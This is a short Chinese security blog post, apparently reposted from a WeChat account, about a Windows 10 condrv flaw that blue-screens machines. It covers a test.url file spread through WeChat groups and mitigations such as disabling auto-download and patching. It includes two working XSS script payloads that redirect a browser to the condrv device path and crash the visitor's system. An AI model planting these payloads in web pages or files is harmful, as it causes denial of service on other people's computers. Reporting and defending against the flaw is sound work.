关于昨日的Windows微信蓝屏操作

  • A+
所属分类:安全闲碎
关于昨日的Windows微信蓝屏操作点击上方蓝字关注我们


该漏洞是由于Windows 10中condrv设备不正确的错误检查导致异常,攻击者可利用该漏洞,通过在浏览器的地址栏中打开特定路径或构造恶意快捷方式进行钓鱼攻击,最终导致Windows 10蓝屏崩溃。


昨日,微信朋友圈和群里到处都是这个漏洞的玩意儿,有人在微信群里分享了一个包含蓝屏payload的test.url文件,微信开启文件自动下载功能的小伙伴就遭殃了,展现出如下的一幕。


受灾画面:


关于昨日的Windows微信蓝屏操作


关于昨日的Windows微信蓝屏操作


关于昨日的Windows微信蓝屏操作


其他利用方式XSS漏洞:


<script>document.location = '\\.\globalroot\device\condrv\kernelconnect';</script><script>document.location = 'file://./globalroot/device/condrv/kernelconnect';</script>


防护方法:
仅对windows10系统有效,其它系统不受影响,windows微信用户可关闭自动下载。


关于昨日的Windows微信蓝屏操作


亦或者使用cmd命令终端找到该文件,并删除。


关于昨日的Windows微信蓝屏操作


火绒官方提供的修复补丁,稳妥起见,用win10的老铁们打上吧。https://down5.huorong.cn/tools/HRCondrvVulFix.exe


关于昨日的Windows微信蓝屏操作

END



往期推荐

【渗透实例】寻找0-day漏洞入侵Apple

【渗透实例】Android渗透测试:WebView攻击

【漏洞分析】WordPress插件中的严重漏洞分析


关于昨日的Windows微信蓝屏操作


好文!必须在看


本文始发于微信公众号(SecTr安全团队):关于昨日的Windows微信蓝屏操作

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: